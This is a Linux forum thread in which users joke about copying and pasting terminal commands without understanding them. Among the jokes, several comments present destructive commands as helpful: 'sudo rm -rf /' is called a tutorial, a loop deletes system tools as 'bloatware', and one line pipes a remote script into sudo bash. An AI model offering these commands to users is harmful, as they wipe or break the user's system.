• pezhore@lemmy.ml
    link
    fedilink
    arrow-up
    47
    ·
    2 years ago

    Nothing better than curl https://totally-legit-installer.com/script | sudo bash

    • garconip@lemmy.world
      link
      fedilink
      arrow-up
      5
      ·
      2 years ago

      I usually get an output saying my distro isn’t supported. So I have to download and edit the script then it can bypass checking os-release or something like that.

        • RealBlstr@lemmy.world
          link
          fedilink
          arrow-up
          10
          ·
          2 years ago

          Ah, the good old days of installing some obscure distro just to reinstall from scratch a week after 👌🏼

          • mfn77@lemmy.world
            link
            fedilink
            arrow-up
            4
            ·
            edit-2
            2 years ago

            I’m still curious about stuff I didn’t try. Like NixOS. Even tough I have a perfectly configured and problem free arch install which could take hours to replicate, I still consider if I should try it.

            • CheshireSnake@iusearchlinux.fyi
              link
              fedilink
              arrow-up
              0
              ·
              edit-2
              2 years ago

              I just switched to NixOS from Endeavour maybe 1/2 days ago. It’s honestly pretty cool(i might have to be extra stupid to break this distro lol), but even as a vanilla Arch user it still kind of confuses me. I’m a linux noob, though. You’ll probably have an easier time with it.

              Edit: i do miss pacman, specially yay.

    • RealBlstr@lemmy.world
      link
      fedilink
      arrow-up
      7
      ·
      2 years ago

      That’s true. I’m no expert, I need to google everything - but after years of reading / coping/ pasting similar things, I started to understand how some things work.

  • Pensi@lemmy.world
    link
    fedilink
    arrow-up
    22
    ·
    2 years ago

    I actually take the time to type everything out, but I still have no idea what I’m doing.

  • DucktorZee@lemmy.world
    link
    fedilink
    arrow-up
    14
    arrow-down
    1
    ·
    2 years ago

    Not just Linux, I do this all the time when ‘writing’ R or Python scripts for work. Then I spend the next 2 hours debugging a missing comma.

  • gunpachi@lemmy.world
    link
    fedilink
    arrow-up
    9
    ·
    2 years ago

    Years ago I started out like this, then gradually started reading and understanding the stuff.

    • purplemonkeymad@lemmy.world
      link
      fedilink
      arrow-up
      1
      ·
      2 years ago

      I sometimes feel like I go all the way around. I find a fix for a problem that says: just copy and paste this. I then spend 3 hours or more reading and trying to understand the snippet, or do it directly. Then I realise the fix is to just copy and paste that original snippet.

      I guess at least I now understand why everyone just does that for that problem.

  • zephyrvs@lemmy.ml
    link
    fedilink
    arrow-up
    6
    arrow-down
    1
    ·
    2 years ago

    I don’t think that’s a terrible way of getting started. Your subconscious will do the rest at some point, unless you’re really not interested at all (which isn’t a problem either). :)

    • ShadyGrove@lemmy.world
      link
      fedilink
      arrow-up
      12
      arrow-down
      1
      ·
      2 years ago

      The real learning happens when you copy and paste something you shouldn’t and bork your system. That’s basically how I started.

        • Viking_Hippie@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          2 years ago

          No offence, but I hope you don’t hold a high ranking government position, what with catastrophic error being the only way you learn 😁

  • Crow@lemmy.world
    link
    fedilink
    arrow-up
    4
    ·
    2 years ago

    ChatGPT has actually been invaluable for switching to Linux for this reason. I only broke my system after I tried finding my own solutions to problems online and copied that code.

  • Rabbithole@kbin.social
    link
    fedilink
    arrow-up
    7
    arrow-down
    3
    ·
    2 years ago

    I’m in a helpful mood so I’ll add something for anyone stuck in OP’s situation.

    It’s ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

    Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

    sudo rm -rf /

    Type your password when prompted and you’re golden. No more linux issues ever again.

    • whoamibro@lemmy.world
      link
      fedilink
      arrow-up
      1
      arrow-down
      1
      ·
      edit-2
      2 years ago

      I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I’ve ever seen. Now I wonder why other OSes don’t do that

      • Rabbithole@kbin.social
        link
        fedilink
        arrow-up
        1
        ·
        2 years ago

        It’s great, isn’t it? As a side bonus, the tutorial modules on system optimization commands are just great. Check how much less RAM and CPU footprint your system’s using now that you’ve run the tutorials. It’s almost like nothing’s going on in the background at all.

        This is the reason that BASH will always be better than Powershell, imho.

          • Rabbithole@kbin.social
            link
            fedilink
            arrow-up
            0
            ·
            2 years ago

            Well, technically it teaches you how to optimize your system.

            That said, the optimizations are really effective.

            • Hello Hotel@lemmy.world
              link
              fedilink
              arrow-up
              0
              ·
              edit-2
              2 years ago

              Note that the more corporate distros install PUPs (Potentially Unwanted Programs). (like clang) To uninstall, do what youd do on a Windows machine and wrip it out of your PC forcably

              while read bloatware; do bloatware="$(echo "$bloatware" | cut -f1 -d'#')"; file="$(whereis "$bloatware" | cut -f2 -d' ')"; if test -f "$file"; do unlink "$file"; fi; done <
              • Rabbithole@kbin.social
                link
                fedilink
                arrow-up
                2
                ·
                2 years ago

                Lol, I know what you mean.

                Isn’t it fucked up how we all say that linux doesn’t have viruses, and yet how many times have you ever seen an install of Mint or Ubuntu that didn’t have “Tree” or “Awk” just sitting there waiting to ruin your whole day.

                I swear to God Canonical have some things to answer for.

  • Joe B@lemmy.world
    link
    fedilink
    arrow-up
    2
    ·
    edit-2
    2 years ago

    Heheh on Linux when you think you found the answer you copy paste, log out and back in. Sometimes reboot if it don’t with try the next copy and paste… so many memories